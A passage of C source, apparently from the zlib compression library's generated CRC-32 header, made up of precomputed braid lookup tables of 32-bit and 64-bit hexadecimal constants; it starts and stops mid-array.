0xc17b0110, 0x8b458a5b, 0x5ca70a03, 0xfff18caa, 0x28130cf2, 0x78cea136, 0xaf2c216e, 0x0c7aa7c7, 0xdb98279f, 0x91a6acd4, 0x46442c8c, 0xe512aa25, 0x32f02a7d, 0x716fbcb3, 0xa68d3ceb, 0x05dbba42, 0xd2393a1a, 0x9807b151, 0x4fe53109, 0xecb3b7a0, 0x3b5137f8, 0x9a11d850, 0x4df35808, 0xeea5dea1, 0x39475ef9, 0x7379d5b2, 0xa49b55ea, 0x07cdd343, 0xd02f531b, 0x93b0c5d5, 0x4452458d, 0xe704c324, 0x30e6437c, 0x7ad8c837, 0xad3a486f, 0x0e6ccec6, 0xd98e4e9e, 0x8953e35a, 0x5eb16302, 0xfde7e5ab, 0x2a0565f3, 0x603beeb8, 0xb7d96ee0, 0x148fe849, 0xc36d6811, 0x80f2fedf, 0x57107e87, 0xf446f82e, 0x23a47876, 0x699af33d, 0xbe787365, 0x1d2ef5cc, 0xcacc7594, 0xbc95ae44, 0x6b772e1c, 0xc821a8b5, 0x1fc328ed, 0x55fda3a6, 0x821f23fe, 0x2149a557, 0xf6ab250f, 0xb534b3c1, 0x62d63399, 0xc180b530, 0x16623568, 0x5c5cbe23, 0x8bbe3e7b, 0x28e8b8d2, 0xff0a388a, 0xafd7954e, 0x78351516, 0xdb6393bf, 0x0c8113e7, 0x46bf98ac, 0x915d18f4, 0x320b9e5d, 0xe5e91e05, 0xa67688cb, 0x71940893, 0xd2c28e3a, 0x05200e62, 0x4f1e8529, 0x98fc0571, 0x3baa83d8, 0xec480380, 0xd7193478, 0x00fbb420, 0xa3ad3289, 0x744fb2d1, 0x3e71399a, 0xe993b9c2, 0x4ac53f6b, 0x9d27bf33, 0xdeb829fd, 0x095aa9a5, 0xaa0c2f0c, 0x7deeaf54, 0x37d0241f, 0xe032a447, 0x436422ee, 0x9486a2b6, 0xc45b0f72, 0x13b98f2a, 0xb0ef0983, 0x670d89db, 0x2d330290, 0xfad182c8, 0x59870461, 0x8e658439, 0xcdfa12f7, 0x1a1892af, 0xb94e1406, 0x6eac945e, 0x24921f15, 0xf3709f4d, 0x502619e4, 0x87c499bc, 0xf19d426c, 0x267fc234, 0x8529449d, 0x52cbc4c5, 0x18f54f8e, 0xcf17cfd6, 0x6c41497f, 0xbba3c927, 0xf83c5fe9, 0x2fdedfb1, 0x8c885918, 0x5b6ad940, 0x1154520b, 0xc6b6d253, 0x65e054fa, 0xb202d4a2, 0xe2df7966, 0x353df93e, 0x966b7f97, 0x4189ffcf, 0x0bb77484, 0xdc55f4dc, 0x7f037275, 0xa8e1f22d, 0xeb7e64e3, 0x3c9ce4bb, 0x9fca6212, 0x4828e24a, 0x02166901, 0xd5f4e959, 0x76a26ff0, 0xa140efa8}, {0x00000000, 0xef52b6e1, 0x05d46b83, 0xea86dd62, 0x0ba8d706, 0xe4fa61e7, 0x0e7cbc85, 0xe12e0a64, 0x1751ae0c, 0xf80318ed, 0x1285c58f, 0xfdd7736e, 0x1cf9790a, 0xf3abcfeb, 0x192d1289, 0xf67fa468, 0x2ea35c18, 0xc1f1eaf9, 0x2b77379b, 0xc425817a, 0x250b8b1e, 0xca593dff, 0x20dfe09d, 0xcf8d567c, 0x39f2f214, 0xd6a044f5, 0x3c269997, 0xd3742f76, 0x325a2512, 0xdd0893f3, 0x378e4e91, 0xd8dcf870, 0x5d46b830, 0xb2140ed1, 0x5892d3b3, 0xb7c06552, 0x56ee6f36, 0xb9bcd9d7, 0x533a04b5, 0xbc68b254, 0x4a17163c, 0xa545a0dd, 0x4fc37dbf, 0xa091cb5e, 0x41bfc13a, 0xaeed77db, 0x446baab9, 0xab391c58, 0x73e5e428, 0x9cb752c9, 0x76318fab, 0x9963394a, 0x784d332e, 0x971f85cf, 0x7d9958ad, 0x92cbee4c, 0x64b44a24, 0x8be6fcc5, 0x616021a7, 0x8e329746, 0x6f1c9d22, 0x804e2bc3, 0x6ac8f6a1, 0x859a4040, 0xba8d7060, 0x55dfc681, 0xbf591be3, 0x500bad02, 0xb125a766, 0x5e771187, 0xb4f1cce5, 0x5ba37a04, 0xaddcde6c, 0x428e688d, 0xa808b5ef, 0x475a030e, 0xa674096a, 0x4926bf8b, 0xa3a062e9, 0x4cf2d408, 0x942e2c78, 0x7b7c9a99, 0x91fa47fb, 0x7ea8f11a, 0x9f86fb7e, 0x70d44d9f, 0x9a5290fd, 0x7500261c, 0x837f8274, 0x6c2d3495, 0x86abe9f7, 0x69f95f16, 0x88d75572, 0x6785e393, 0x8d033ef1, 0x62518810, 0xe7cbc850, 0x08997eb1, 0xe21fa3d3, 0x0d4d1532, 0xec631f56, 0x0331a9b7, 0xe9b774d5, 0x06e5c234, 0xf09a665c, 0x1fc8d0bd, 0xf54e0ddf, 0x1a1cbb3e, 0xfb32b15a, 0x146007bb, 0xfee6dad9, 0x11b46c38, 0xc9689448, 0x263a22a9, 0xccbcffcb, 0x23ee492a, 0xc2c0434e, 0x2d92f5af, 0xc71428cd, 0x28469e2c, 0xde393a44, 0x316b8ca5, 0xdbed51c7, 0x34bfe726, 0xd591ed42, 0x3ac35ba3, 0xd04586c1, 0x3f173020, 0xae6be681, 0x41395060, 0xabbf8d02, 0x44ed3be3, 0xa5c33187, 0x4a918766, 0xa0175a04, 0x4f45ece5, 0xb93a488d, 0x5668fe6c, 0xbcee230e, 0x53bc95ef, 0xb2929f8b, 0x5dc0296a, 0xb746f408, 0x581442e9, 0x80c8ba99, 0x6f9a0c78, 0x851cd11a, 0x6a4e67fb, 0x8b606d9f, 0x6432db7e, 0x8eb4061c, 0x61e6b0fd, 0x97991495, 0x78cba274, 0x924d7f16, 0x7d1fc9f7, 0x9c31c393, 0x73637572, 0x99e5a810, 0x76b71ef1, 0xf32d5eb1, 0x1c7fe850, 0xf6f93532, 0x19ab83d3, 0xf88589b7, 0x17d73f56, 0xfd51e234, 0x120354d5, 0xe47cf0bd, 0x0b2e465c, 0xe1a89b3e, 0x0efa2ddf, 0xefd427bb, 0x0086915a, 0xea004c38, 0x0552fad9, 0xdd8e02a9, 0x32dcb448, 0xd85a692a, 0x3708dfcb, 0xd626d5af, 0x3974634e, 0xd3f2be2c, 0x3ca008cd, 0xcadfaca5, 0x258d1a44, 0xcf0bc726, 0x205971c7, 0xc1777ba3, 0x2e25cd42, 0xc4a31020, 0x2bf1a6c1, 0x14e696e1, 0xfbb42000, 0x1132fd62, 0xfe604b83, 0x1f4e41e7, 0xf01cf706, 0x1a9a2a64, 0xf5c89c85, 0x03b738ed, 0xece58e0c, 0x0663536e, 0xe931e58f, 0x081fefeb, 0xe74d590a, 0x0dcb8468, 0xe2993289, 0x3a45caf9, 0xd5177c18, 0x3f91a17a, 0xd0c3179b, 0x31ed1dff, 0xdebfab1e, 0x3439767c, 0xdb6bc09d, 0x2d1464f5, 0xc246d214, 0x28c00f76, 0xc792b997, 0x26bcb3f3, 0xc9ee0512, 0x2368d870, 0xcc3a6e91, 0x49a02ed1, 0xa6f29830, 0x4c744552, 0xa326f3b3, 0x4208f9d7, 0xad5a4f36, 0x47dc9254, 0xa88e24b5, 0x5ef180dd, 0xb1a3363c, 0x5b25eb5e, 0xb4775dbf, 0x555957db, 0xba0be13a, 0x508d3c58, 0xbfdf8ab9, 0x670372c9, 0x8851c428, 0x62d7194a, 0x8d85afab, 0x6caba5cf, 0x83f9132e, 0x697fce4c, 0x862d78ad, 0x7052dcc5, 0x9f006a24, 0x7586b746, 0x9ad401a7, 0x7bfa0bc3, 0x94a8bd22, 0x7e2e6040, 0x917cd6a1}, {0x00000000, 0x87a6cb43, 0xd43c90c7, 0x539a5b84, 0x730827cf, 0xf4aeec8c, 0xa734b708, 0x20927c4b, 0xe6104f9e, 0x61b684dd, 0x322cdf59, 0xb58a141a, 0x95186851, 0x12bea312, 0x4124f896, 0xc68233d5, 0x1751997d, 0x90f7523e, 0xc36d09ba, 0x44cbc2f9, 0x6459beb2, 0xe3ff75f1, 0xb0652e75, 0x37c3e536, 0xf141d6e3, 0x76e71da0, 0x257d4624, 0xa2db8d67, 0x8249f12c, 0x05ef3a6f, 0x567561eb, 0xd1d3aaa8, 0x2ea332fa, 0xa905f9b9, 0xfa9fa23d, 0x7d39697e, 0x5dab1535, 0xda0dde76, 0x899785f2, 0x0e314eb1, 0xc8b37d64, 0x4f15b627, 0x1c8feda3, 0x9b2926e0, 0xbbbb5aab, 0x3c1d91e8, 0x6f87ca6c, 0xe821012f, 0x39f2ab87, 0xbe5460c4, 0xedce3b40, 0x6a68f003, 0x4afa8c48, 0xcd5c470b, 0x9ec61c8f, 0x1960d7cc, 0xdfe2e419, 0x58442f5a, 0x0bde74de, 0x8c78bf9d, 0xaceac3d6, 0x2b4c0895, 0x78d65311, 0xff709852, 0x5d4665f4, 0xdae0aeb7, 0x897af533, 0x0edc3e70, 0x2e4e423b, 0xa9e88978, 0xfa72d2fc, 0x7dd419bf, 0xbb562a6a, 0x3cf0e129, 0x6f6abaad, 0xe8cc71ee, 0xc85e0da5, 0x4ff8c6e6, 0x1c629d62, 0x9bc45621, 0x4a17fc89, 0xcdb137ca, 0x9e2b6c4e, 0x198da70d, 0x391fdb46, 0xbeb91005, 0xed234b81, 0x6a8580c2, 0xac07b317, 0x2ba17854, 0x783b23d0, 0xff9de893, 0xdf0f94d8, 0x58a95f9b, 0x0b33041f, 0x8c95cf5c, 0x73e5570e, 0xf4439c4d, 0xa7d9c7c9, 0x207f0c8a, 0x00ed70c1, 0x874bbb82, 0xd4d1e006, 0x53772b45, 0x95f51890, 0x1253d3d3, 0x41c98857, 0xc66f4314, 0xe6fd3f5f, 0x615bf41c, 0x32c1af98, 0xb56764db, 0x64b4ce73, 0xe3120530, 0xb0885eb4, 0x372e95f7, 0x17bce9bc, 0x901a22ff, 0xc380797b, 0x4426b238, 0x82a481ed, 0x05024aae, 0x5698112a, 0xd13eda69, 0xf1aca622, 0x760a6d61, 0x259036e5, 0xa236fda6, 0xba8ccbe8, 0x3d2a00ab, 0x6eb05b2f, 0xe916906c, 0xc984ec27, 0x4e222764, 0x1db87ce0, 0x9a1eb7a3, 0x5c9c8476, 0xdb3a4f35, 0x88a014b1, 0x0f06dff2, 0x2f94a3b9, 0xa83268fa, 0xfba8337e, 0x7c0ef83d, 0xaddd5295, 0x2a7b99d6, 0x79e1c252, 0xfe470911, 0xded5755a, 0x5973be19, 0x0ae9e59d, 0x8d4f2ede, 0x4bcd1d0b, 0xcc6bd648, 0x9ff18dcc, 0x1857468f, 0x38c53ac4, 0xbf63f187, 0xecf9aa03, 0x6b5f6140, 0x942ff912, 0x13893251, 0x401369d5, 0xc7b5a296, 0xe727dedd, 0x6081159e, 0x331b4e1a, 0xb4bd8559, 0x723fb68c, 0xf5997dcf, 0xa603264b, 0x21a5ed08, 0x01379143, 0x86915a00, 0xd50b0184, 0x52adcac7, 0x837e606f, 0x04d8ab2c, 0x5742f0a8, 0xd0e43beb, 0xf07647a0, 0x77d08ce3, 0x244ad767, 0xa3ec1c24, 0x656e2ff1, 0xe2c8e4b2, 0xb152bf36, 0x36f47475, 0x1666083e, 0x91c0c37d, 0xc25a98f9, 0x45fc53ba, 0xe7caae1c, 0x606c655f, 0x33f63edb, 0xb450f598, 0x94c289d3, 0x13644290, 0x40fe1914, 0xc758d257, 0x01dae182, 0x867c2ac1, 0xd5e67145, 0x5240ba06, 0x72d2c64d, 0xf5740d0e, 0xa6ee568a, 0x21489dc9, 0xf09b3761, 0x773dfc22, 0x24a7a7a6, 0xa3016ce5, 0x839310ae, 0x0435dbed, 0x57af8069, 0xd0094b2a, 0x168b78ff, 0x912db3bc, 0xc2b7e838, 0x4511237b, 0x65835f30, 0xe2259473, 0xb1bfcff7, 0x361904b4, 0xc9699ce6, 0x4ecf57a5, 0x1d550c21, 0x9af3c762, 0xba61bb29, 0x3dc7706a, 0x6e5d2bee, 0xe9fbe0ad, 0x2f79d378, 0xa8df183b, 0xfb4543bf, 0x7ce388fc, 0x5c71f4b7, 0xdbd73ff4, 0x884d6470, 0x0febaf33, 0xde38059b, 0x599eced8, 0x0a04955c, 0x8da25e1f, 0xad302254, 0x2a96e917, 0x790cb293, 0xfeaa79d0, 0x38284a05, 0xbf8e8146, 0xec14dac2, 0x6bb21181, 0x4b206dca, 0xcc86a689, 0x9f1cfd0d, 0x18ba364e}}; local const z_word_t FAR crc_braid_big_table[][256] = { {0x0000000000000000, 0x43cba68700000000, 0xc7903cd400000000, 0x845b9a5300000000, 0xcf27087300000000, 0x8cecaef400000000, 0x08b734a700000000, 0x4b7c922000000000, 0x9e4f10e600000000, 0xdd84b66100000000, 0x59df2c3200000000, 0x1a148ab500000000, 0x5168189500000000, 0x12a3be1200000000, 0x96f8244100000000, 0xd53382c600000000, 0x7d99511700000000, 0x3e52f79000000000, 0xba096dc300000000, 0xf9c2cb4400000000, 0xb2be596400000000, 0xf175ffe300000000, 0x752e65b000000000, 0x36e5c33700000000, 0xe3d641f100000000, 0xa01de77600000000, 0x24467d2500000000, 0x678ddba200000000, 0x2cf1498200000000, 0x6f3aef0500000000, 0xeb61755600000000, 0xa8aad3d100000000, 0xfa32a32e00000000, 0xb9f905a900000000, 0x3da29ffa00000000, 0x7e69397d00000000, 0x3515ab5d00000000, 0x76de0dda00000000, 0xf285978900000000, 0xb14e310e00000000, 0x647db3c800000000, 0x27b6154f00000000, 0xa3ed8f1c00000000, 0xe026299b00000000, 0xab5abbbb00000000, 0xe8911d3c00000000, 0x6cca876f00000000, 0x2f0121e800000000, 0x87abf23900000000, 0xc46054be00000000, 0x403bceed00000000, 0x03f0686a00000000, 0x488cfa4a00000000, 0x0b475ccd00000000, 0x8f1cc69e00000000, 0xccd7601900000000, 0x19e4e2df00000000, 0x5a2f445800000000, 0xde74de0b00000000, 0x9dbf788c00000000, 0xd6c3eaac00000000, 0x95084c2b00000000, 0x1153d67800000000, 0x529870ff00000000, 0xf465465d00000000, 0xb7aee0da00000000, 0x33f57a8900000000, 0x703edc0e00000000, 0x3b424e2e00000000, 0x7889e8a900000000, 0xfcd272fa00000000, 0xbf19d47d00000000, 0x6a2a56bb00000000, 0x29e1f03c00000000, 0xadba6a6f00000000, 0xee71cce800000000, 0xa50d5ec800000000, 0xe6c6f84f00000000, 0x629d621c00000000, 0x2156c49b00000000, 0x89fc174a00000000, 0xca37b1cd00000000, 0x4e6c2b9e00000000, 0x0da78d1900000000, 0x46db1f3900000000, 0x0510b9be00000000, 0x814b23ed00000000, 0xc280856a00000000, 0x17b307ac00000000, 0x5478a12b00000000, 0xd0233b7800000000, 0x93e89dff00000000, 0xd8940fdf00000000, 0x9b5fa95800000000, 0x1f04330b00000000, 0x5ccf958c00000000, 0x0e57e57300000000, 0x4d9c43f400000000, 0xc9c7d9a700000000, 0x8a0c7f2000000000, 0xc170ed0000000000, 0x82bb4b8700000000, 0x06e0d1d400000000, 0x452b775300000000, 0x9018f59500000000, 0xd3d3531200000000, 0x5788c94100000000, 0x14436fc600000000, 0x5f3ffde600000000, 0x1cf45b6100000000, 0x98afc13200000000, 0xdb6467b500000000, 0x73ceb46400000000, 0x300512e300000000, 0xb45e88b000000000, 0xf7952e3700000000, 0xbce9bc1700000000, 0xff221a9000000000, 0x7b7980c300000000, 0x38b2264400000000, 0xed81a48200000000, 0xae4a020500000000, 0x2a11985600000000, 0x69da3ed100000000, 0x22a6acf100000000, 0x616d0a7600000000, 0xe536902500000000, 0xa6fd36a200000000, 0xe8cb8cba00000000, 0xab002a3d00000000, 0x2f5bb06e00000000, 0x6c9016e900000000, 0x27ec84c900000000, 0x6427224e00000000, 0xe07cb81d00000000, 0xa3b71e9a00000000, 0x76849c5c00000000, 0x354f3adb00000000, 0xb114a08800000000, 0xf2df060f00000000, 0xb9a3942f00000000, 0xfa6832a800000000, 0x7e33a8fb00000000, 0x3df80e7c00000000, 0x9552ddad00000000, 0xd6997b2a00000000, 0x52c2e17900000000, 0x110947fe00000000, 0x5a75d5de00000000, 0x19be735900000000, 0x9de5e90a00000000, 0xde2e4f8d00000000, 0x0b1dcd4b00000000, 0x48d66bcc00000000, 0xcc8df19f00000000, 0x8f46571800000000, 0xc43ac53800000000, 0x87f163bf00000000, 0x03aaf9ec00000000, 0x40615f6b00000000, 0x12f92f9400000000, 0x5132891300000000, 0xd569134000000000, 0x96a2b5c700000000, 0xddde27e700000000, 0x9e15816000000000, 0x1a4e1b3300000000, 0x5985bdb400000000, 0x8cb63f7200000000, 0xcf7d99f500000000, 0x4b2603a600000000, 0x08eda52100000000, 0x4391370100000000, 0x005a918600000000, 0x84010bd500000000, 0xc7caad5200000000, 0x6f607e8300000000, 0x2cabd80400000000, 0xa8f0425700000000, 0xeb3be4d000000000, 0xa04776f000000000, 0xe38cd07700000000, 0x67d74a2400000000, 0x241ceca300000000, 0xf12f6e6500000000, 0xb2e4c8e200000000, 0x36bf52b100000000, 0x7574f43600000000, 0x3e08661600000000, 0x7dc3c09100000000, 0xf9985ac200000000, 0xba53fc4500000000, 0x1caecae700000000, 0x5f656c6000000000, 0xdb3ef63300000000, 0x98f550b400000000, 0xd389c29400000000, 0x9042641300000000, 0x1419fe4000000000, 0x57d258c700000000, 0x82e1da0100000000, 0xc12a7c8600000000, 0x4571e6d500000000, 0x06ba405200000000, 0x4dc6d27200000000, 0x0e0d74f500000000, 0x8a56eea600000000, 0xc99d482100000000, 0x61379bf000000000, 0x22fc3d7700000000, 0xa6a7a72400000000, 0xe56c01a300000000, 0xae10938300000000, 0xeddb350400000000, 0x6980af5700000000, 0x2a4b09d000000000, 0xff788b1600000000, 0xbcb32d9100000000, 0x38e8b7c200000000, 0x7b23114500000000, 0x305f836500000000, 0x739425e200000000, 0xf7cfbfb100000000, 0xb404193600000000, 0xe69c69c900000000, 0xa557cf4e00000000, 0x210c551d00000000, 0x62c7f39a00000000, 0x29bb61ba00000000, 0x6a70c73d00000000, 0xee2b5d6e00000000, 0xade0fbe900000000, 0x78d3792f00000000, 0x3b18dfa800000000, 0xbf4345fb00000000, 0xfc88e37c00000000, 0xb7f4715c00000000, 0xf43fd7db00000000, 0x70644d8800000000, 0x33afeb0f00000000, 0x9b0538de00000000, 0xd8ce9e5900000000, 0x5c95040a00000000, 0x1f5ea28d00000000, 0x542230ad00000000, 0x17e9962a00000000, 0x93b20c7900000000, 0xd079aafe00000000, 0x054a283800000000, 0x46818ebf00000000, 0xc2da14ec00000000, 0x8111b26b00000000, 0xca6d204b00000000, 0x89a686cc00000000, 0x0dfd1c9f00000000, 0x4e36ba1800000000}, {0x0000000000000000, 0xe1b652ef00000000, 0x836bd40500000000, 0x62dd86ea00000000, 0x06d7a80b00000000, 0xe761fae400000000, 0x85bc7c0e00000000, 0x640a2ee100000000, 0x0cae511700000000, 0xed1803f800000000, 0x8fc5851200000000, 0x6e73d7fd00000000, 0x0a79f91c00000000, 0xebcfabf300000000, 0x89122d1900000000, 0x68a47ff600000000, 0x185ca32e00000000, 0xf9eaf1c100000000, 0x9b37772b00000000, 0x7a8125c400000000, 0x1e8b0b2500000000, 0xff3d59ca00000000, 0x9de0df2000000000, 0x7c568dcf00000000, 0x14f2f23900000000, 0xf544a0d600000000, 0x9799263c00000000, 0x762f74d300000000, 0x12255a3200000000, 0xf39308dd00000000, 0x914e8e3700000000, 0x70f8dcd800000000, 0x30b8465d00000000, 0xd10e14b200000000, 0xb3d3925800000000, 0x5265c0b700000000, 0x366fee5600000000, 0xd7d9bcb900000000, 0xb5043a5300000000, 0x54b268bc00000000, 0x3c16174a00000000, 0xdda045a500000000, 0xbf7dc34f00000000, 0x5ecb91a000000000, 0x3ac1bf4100000000, 0xdb77edae00000000, 0xb9aa6b4400000000, 0x581c39ab00000000, 0x28e4e57300000000, 0xc952b79c00000000, 0xab8f317600000000, 0x4a39639900000000, 0x2e334d7800000000, 0xcf851f9700000000, 0xad58997d00000000, 0x4ceecb9200000000, 0x244ab46400000000, 0xc5fce68b00000000, 0xa721606100000000, 0x4697328e00000000, 0x229d1c6f00000000, 0xc32b4e8000000000, 0xa1f6c86a00000000, 0x40409a8500000000, 0x60708dba00000000, 0x81c6df5500000000, 0xe31b59bf00000000, 0x02ad0b5000000000, 0x66a725b100000000, 0x8711775e00000000, 0xe5ccf1b400000000, 0x047aa35b00000000, 0x6cdedcad00000000, 0x8d688e4200000000, 0xefb508a800000000, 0x0e035a4700000000, 0x6a0974a600000000, 0x8bbf264900000000, 0xe962a0a300000000, 0x08d4f24c00000000, 0x782c2e9400000000, 0x999a7c7b00000000, 0xfb47fa9100000000, 0x1af1a87e00000000, 0x7efb869f00000000, 0x9f4dd47000000000, 0xfd90529a00000000, 0x1c26007500000000, 0x74827f8300000000, 0x95342d6c00000000, 0xf7e9ab8600000000, 0x165ff96900000000, 0x7255d78800000000, 0x93e3856700000000, 0xf13e038d00000000, 0x1088516200000000, 0x50c8cbe700000000, 0xb17e990800000000, 0xd3a31fe200000000, 0x32154d0d00000000, 0x561f63ec00000000, 0xb7a9310300000000, 0xd574b7e900000000, 0x34c2e50600000000, 0x5c669af000000000, 0xbdd0c81f00000000, 0xdf0d4ef500000000, 0x3ebb1c1a00000000, 0x5ab132fb00000000, 0xbb07601400000000, 0xd9dae6fe00000000, 0x386cb41100000000, 0x489468c900000000, 0xa9223a2600000000, 0xcbffbccc00000000, 0x2a49ee2300000000, 0x4e43c0c200000000, 0xaff5922d00000000, 0xcd2814c700000000, 0x2c9e462800000000, 0x443a39de00000000, 0xa58c6b3100000000, 0xc751eddb00000000, 0x26e7bf3400000000, 0x42ed91d500000000, 0xa35bc33a00000000, 0xc18645d000000000, 0x2030173f00000000, 0x81e66bae00000000, 0x6050394100000000, 0x028dbfab00000000, 0xe33bed4400000000, 0x8731c3a500000000, 0x6687914a00000000, 0x045a17a000000000, 0xe5ec454f00000000, 0x8d483ab900000000, 0x6cfe685600000000, 0x0e23eebc00000000, 0xef95bc5300000000, 0x8b9f92b200000000, 0x6a29c05d00000000, 0x08f446b700000000, 0xe942145800000000, 0x99bac88000000000, 0x780c9a6f00000000, 0x1ad11c8500000000, 0xfb674e6a00000000, 0x9f6d608b00000000, 0x7edb326400000000, 0x1c06b48e00000000, 0xfdb0e66100000000, 0x9514999700000000, 0x74a2cb7800000000, 0x167f4d9200000000, 0xf7c91f7d00000000, 0x93c3319c00000000, 0x7275637300000000, 0x10a8e59900000000, 0xf11eb77600000000, 0xb15e2df300000000, 0x50e87f1c00000000, 0x3235f9f600000000, 0xd383ab1900000000, 0xb78985f800000000, 0x563fd71700000000, 0x34e251fd00000000, 0xd554031200000000, 0xbdf07ce400000000, 0x5c462e0b00000000, 0x3e9ba8e100000000, 0xdf2dfa0e00000000, 0xbb27d4ef00000000, 0x5a91860000000000, 0x384c00ea00000000, 0xd9fa520500000000, 0xa9028edd00000000, 0x48b4dc3200000000, 0x2a695ad800000000, 0xcbdf083700000000, 0xafd526d600000000, 0x4e63743900000000, 0x2cbef2d300000000, 0xcd08a03c00000000, 0xa5acdfca00000000, 0x441a8d2500000000, 0x26c70bcf00000000, 0xc771592000000000, 0xa37b77c100000000, 0x42cd252e00000000, 0x2010a3c400000000, 0xc1a6f12b00000000, 0xe196e61400000000, 0x0020b4fb00000000, 0x62fd321100000000, 0x834b60fe00000000, 0xe7414e1f00000000, 0x06f71cf000000000, 0x642a9a1a00000000, 0x859cc8f500000000, 0xed38b70300000000, 0x0c8ee5ec00000000, 0x6e53630600000000, 0x8fe531e900000000, 0xebef1f0800000000, 0x0a594de700000000, 0x6884cb0d00000000, 0x893299e200000000, 0xf9ca453a00000000, 0x187c17d500000000, 0x7aa1913f00000000, 0x9b17c3d000000000, 0xff1ded3100000000, 0x1eabbfde00000000, 0x7c76393400000000, 0x9dc06bdb00000000, 0xf564142d00000000, 0x14d246c200000000, 0x760fc02800000000, 0x97b992c700000000, 0xf3b3bc2600000000, 0x1205eec900000000, 0x70d8682300000000, 0x916e3acc00000000, 0xd12ea04900000000, 0x3098f2a600000000, 0x5245744c00000000, 0xb3f326a300000000, 0xd7f9084200000000, 0x364f5aad00000000, 0x5492dc4700000000, 0xb5248ea800000000, 0xdd80f15e00000000, 0x3c36a3b100000000, 0x5eeb255b00000000, 0xbf5d77b400000000, 0xdb57595500000000, 0x3ae10bba00000000, 0x583c8d5000000000, 0xb98adfbf00000000, 0xc972036700000000, 0x28c4518800000000, 0x4a19d76200000000, 0xabaf858d00000000, 0xcfa5ab6c00000000, 0x2e13f98300000000, 0x4cce7f6900000000, 0xad782d8600000000, 0xc5dc527000000000, 0x246a009f00000000, 0x46b7867500000000, 0xa701d49a00000000, 0xc30bfa7b00000000, 0x22bda89400000000, 0x40602e7e00000000, 0xa1d67c9100000000}, {0x0000000000000000, 0x5880e2d700000000, 0xf106b47400000000, 0xa98656a300000000, 0xe20d68e900000000, 0xba8d8a3e00000000, 0x130bdc9d00000000, 0x4b8b3e4a00000000, 0x851da10900000000, 0xdd9d43de00000000, 0x741b157d00000000, 0x2c9bf7aa00000000, 0x6710c9e000000000, 0x3f902b3700000000, 0x96167d9400000000, 0xce969f4300000000, 0x0a3b421300000000, 0x52bba0c400000000, 0xfb3df66700000000, 0xa3bd14b000000000, 0xe8362afa00000000, 0xb0b6c82d00000000, 0x19309e8e00000000, 0x41b07c5900000000, 0x8f26e31a00000000, 0xd7a601cd00000000, 0x7e20576e00000000, 0x26a0b5b900000000, 0x6d2b8bf300000000, 0x35ab692400000000, 0x9c2d3f8700000000, 0xc4addd5000000000, 0x1476842600000000, 0x4cf666f100000000, 0xe570305200000000, 0xbdf0d28500000000, 0xf67beccf00000000, 0xaefb0e1800000000, 0x077d58bb00000000, 0x5ffdba6c00000000, 0x916b252f00000000, 0xc9ebc7f800000000, 0x606d915b00000000, 0x38ed738c00000000, 0x73664dc600000000, 0x2be6af1100000000, 0x8260f9b200000000, 0xdae01b6500000000, 0x1e4dc63500000000, 0x46cd24e200000000, 0xef4b724100000000, 0xb7cb909600000000, 0xfc40aedc00000000, 0xa4c04c0b00000000, 0x0d461aa800000000, 0x55c6f87f00000000, 0x9b50673c00000000, 0xc3d085eb00000000, 0x6a56d34800000000, 0x32d6319f00000000, 0x795d0fd500000000, 0x21dded0200000000, 0x885bbba100000000, 0xd0db597600000000, 0x28ec084d00000000, 0x706cea9a00000000, 0xd9eabc3900000000, 0x816a5eee00000000, 0xcae160a400000000, 0x9261827300000000, 0x3be7d4d000000000, 0x6367360700000000, 0xadf1a94400000000, 0xf5714b9300000000, 0x5cf71d3000000000, 0x0477ffe700000000, 0x4ffcc1ad00000000, 0x177c237a00000000, 0xbefa75d900000000, 0xe67a970e00000000, 0x22d74a5e00000000, 0x7a57a88900000000, 0xd3d1fe2a00000000, 0x8b511cfd00000000, 0xc0da22b700000000, 0x985ac06000000000, 0x31dc96c300000000, 0x695c741400000000, 0xa7caeb5700000000, 0xff4a098000000000, 0x56cc5f2300000000, 0x0e4cbdf400000000, 0x45c783be00000000, 0x1d47616900000000, 0xb4c137ca00000000, 0xec41d51d00000000, 0x3c9a8c6b00000000, 0x641a6ebc00000000, 0xcd9c381f00000000, 0x951cdac800000000, 0xde97e48200000000, 0x8617065500000000, 0x2f9150f600000000, 0x7711b22100000000, 0xb9872d6200000000, 0xe107cfb500000000, 0x4881991600000000, 0x10017bc100000000, 0x5b8a458b00000000, 0x030aa75c00000000, 0xaa8cf1ff00000000, 0xf20c132800000000, 0x36a1ce7800000000, 0x6e212caf00000000, 0xc7a77a0c00000000, 0x9f2798db00000000, 0xd4aca69100000000, 0x8c2c444600000000, 0x25aa12e500000000, 0x7d2af03200000000, 0xb3bc6f7100000000, 0xeb3c8da600000000, 0x42badb0500000000, 0x1a3a39d200000000, 0x51b1079800000000, 0x0931e54f00000000, 0xa0b7b3ec00000000, 0xf837513b00000000, 0x50d8119a00000000, 0x0858f34d00000000, 0xa1dea5ee00000000, 0xf95e473900000000, 0xb2d5797300000000, 0xea559ba400000000, 0x43d3cd0700000000, 0x1b532fd000000000, 0xd5c5b09300000000, 0x8d45524400000000, 0x24c304e700000000, 0x7c43e63000000000, 0x37c8d87a00000000, 0x6f483aad00000000, 0xc6ce6c0e00000000, 0x9e4e8ed900000000, 0x5ae3538900000000, 0x0263b15e00000000, 0xabe5e7fd00000000, 0xf365052a00000000, 0xb8ee3b6000000000, 0xe06ed9b700000000, 0x49e88f1400000000, 0x11686dc300000000, 0xdffef28000000000, 0x877e105700000000, 0x2ef846f400000000, 0x7678a42300000000, 0x3df39a6900000000, 0x657378be00000000, 0xccf52e1d00000000, 0x9475ccca00000000, 0x44ae95bc00000000, 0x1c2e776b00000000, 0xb5a821c800000000, 0xed28c31f00000000, 0xa6a3fd5500000000, 0xfe231f8200000000, 0x57a5492100000000, 0x0f25abf600000000, 0xc1b334b500000000, 0x9933d66200000000, 0x30b580c100000000, 0x6835621600000000, 0x23be5c5c00000000, 0x7b3ebe8b00000000, 0xd2b8e82800000000, 0x8a380aff00000000, 0x4e95d7af00000000, 0x1615357800000000, 0xbf9363db00000000, 0xe713810c00000000, 0xac98bf4600000000, 0xf4185d9100000000, 0x5d9e0b3200000000, 0x051ee9e500000000, 0xcb8876a600000000, 0x9308947100000000, 0x3a8ec2d200000000, 0x620e200500000000, 0x29851e4f00000000, 0x7105fc9800000000, 0xd883aa3b00000000, 0x800348ec00000000, 0x783419d700000000, 0x20b4fb0000000000, 0x8932ada300000000, 0xd1b24f7400000000, 0x9a39713e00000000, 0xc2b993e900000000, 0x6b3fc54a00000000, 0x33bf279d00000000, 0xfd29b8de00000000, 0xa5a95a0900000000, 0x0c2f0caa00000000, 0x54afee7d00000000, 0x1f24d03700000000, 0x47a432e000000000, 0xee22644300000000, 0xb6a2869400000000, 0x720f5bc400000000, 